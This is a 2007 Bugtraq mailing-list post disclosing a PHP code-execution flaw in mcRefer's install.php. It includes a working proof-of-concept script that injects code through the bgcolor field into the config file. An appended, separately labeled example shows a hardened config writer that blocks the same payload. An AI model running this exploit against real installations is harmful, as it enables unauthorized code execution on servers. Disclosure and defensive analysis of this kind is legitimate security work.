Message-ID: <20070211112617.20122.qmail@securityfocus.com>
Date: 11 Feb 2007 11:26:17 -0000
From: gmdarkfig@...il.com
To: bugtraq@...urityfocus.com
Subject: Re: mcRefer SQL injection

This is not an SQL injection. The script doesn't use any SQL database, please tell me where the SQL request is =). However, the install.php script can lead to PHP code execution (works regardless of php.ini settings). Proof of concept:
-----

#!/usr/bin/php
<?php
# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
#
# Author: DarkFig
# Mail: gmdarkfig@...il.com
#
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);

$url = ""; # http://<host><path>
$cod = "print(poc)";
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
$xpl->post($url.'install','p=XD&verif=1&envoi=Entrer');
$xpl->post($url.'install.php',"bgcolor=%24wazup%7B%24hello%7B${cod}%7D%7D&tablecolor=1&tdcolor=1&fontface=1&fontsize=1&fontcolor=1&nomsite=1&url=$url&email=me%40u.com&pass=XD&verif=1&submit=1");
$xpl->get($url.'mcrconf.inc.php');
print($xpl->getcontent());
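
A defensive counterpart to the proof of concept above, added here as an example and not part of the original post or of mcRefer's own code: a config writer that allow-lists each field and emits it with var_export(). It assumes install.php stores the posted form fields as PHP variables in mcrconf.inc.php; render_config, FIELD_RULES and the patterns are hypothetical.

```php
<?php
// Added example (not mcRefer code). Field names come from the POST body in
// the message; the rules and function names are assumptions.

// One allow-list pattern per stored field. \z (not $) so that a trailing
// newline cannot slip past the check.
const FIELD_RULES = [
    'bgcolor'  => '/^#?[0-9A-Za-z]{3,20}\z/',
    'fontface' => '/^[A-Za-z0-9 ,-]{1,64}\z/',
    'fontsize' => '/^[0-9]{1,2}\z/',
    'nomsite'  => '/^[^\x00-\x1f]{1,100}\z/u',   // free text, no control bytes
];

// Build the contents of the config include from validated input only.
function render_config(array $input): string
{
    $out = "<?php\n";
    foreach (FIELD_RULES as $name => $pattern) {
        $value = $input[$name] ?? '';
        if (!is_string($value) || preg_match($pattern, $value) !== 1) {
            throw new InvalidArgumentException("rejected field: $name");
        }
        // var_export() emits a single-quoted literal with ' and \ escaped,
        // so "$", "{" and "}" in the value are never parsed as PHP syntax
        // when the file is later included.
        $out .= '$' . $name . ' = ' . var_export($value, true) . ";\n";
    }
    return $out;
}

// Constructed sample input: the bgcolor value from the message, URL-decoded.
$payload = '$wazup{$hello{print(poc)}}';
$fields  = [
    'bgcolor'  => '#ffffff',
    'fontface' => 'Verdana',
    'fontsize' => '12',
    'nomsite'  => $payload,   // allowed as free text, stored as inert data
];
echo render_config($fields);

// The same string in a colour field fails the allow-list before any write.
try {
    render_config(['bgcolor' => $payload] + $fields);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```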
